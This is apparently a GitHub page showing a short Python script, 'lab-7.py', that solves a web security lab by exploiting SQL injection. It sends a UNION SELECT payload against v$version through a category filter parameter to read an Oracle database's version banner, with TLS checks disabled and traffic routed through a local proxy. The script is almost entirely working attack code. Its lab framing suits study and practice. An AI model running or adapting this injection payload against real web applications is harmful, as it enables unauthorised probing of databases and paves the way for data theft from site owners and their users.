-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlab-7.py
40 lines (33 loc) · 1.21 KB
/
lab-7.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re
import pyfiglet
# Display a banner using pyfiglet
ascii_banner = pyfiglet.figlet_format("RuhanSec")
print(ascii_banner)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080'}
def exploit_sqli_version(url):
path = "/filter?category=Lifestyle"
sql_payload = "' UNION SELECT banner, NULL from v$version--"
r = requests.get(url + path + sql_payload, verify=False, proxies=proxies)
res = r.text
if "Oracle Database" in res:
print("[+] Found the database version.")
soup = BeautifulSoup(res,'html.parser')
version = soup.find(text=re.compile('.*Oracle\sDatabase\s11g.*'))
print("[+] The Oracle database version is: " + version)
return True
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
except IndexError:
print("[-] Usage: %s <url>" % sys.argv[0])
print("[-] Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
print("[+] Dumping the version of the database...")
if not exploit_sqli_version(url):
print("[-] Unable to dump the database version.")